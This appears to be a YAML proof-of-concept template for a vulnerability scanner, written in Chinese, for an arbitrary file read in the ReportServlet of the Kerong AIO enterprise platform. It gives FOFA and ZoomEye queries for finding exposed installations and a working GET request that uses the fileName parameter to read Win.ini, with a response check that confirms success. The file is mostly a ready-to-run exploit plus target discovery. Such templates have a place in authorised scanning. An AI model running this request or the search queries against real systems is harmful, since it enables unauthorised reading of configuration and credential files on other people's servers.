product: 科荣企业运营管理平台
vName: 科荣 AIO ReportServlet 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 科荣AIO ReportServlet 接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
version: ''
note: ''
search:
  FOFA: body="changeAccount('8000')"
  ZoomEye: changeAccount('8000')
protocol: http
link: https://download.csdn.net/blog/column/10118303/135274892
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and